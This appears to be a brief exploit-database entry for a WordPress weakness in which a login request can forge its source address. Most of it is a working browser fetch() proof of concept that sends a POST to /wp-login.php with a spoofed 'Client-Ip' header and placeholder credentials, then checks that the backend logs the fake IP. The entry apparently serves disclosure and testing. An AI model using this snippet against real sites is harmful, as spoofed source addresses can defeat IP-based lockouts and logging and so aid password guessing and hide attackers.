Share
## https://sploitus.com/exploit?id=WPEX-ID:F5EA6C8A-6B07-4263-A1BE-DD033F078D49
Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});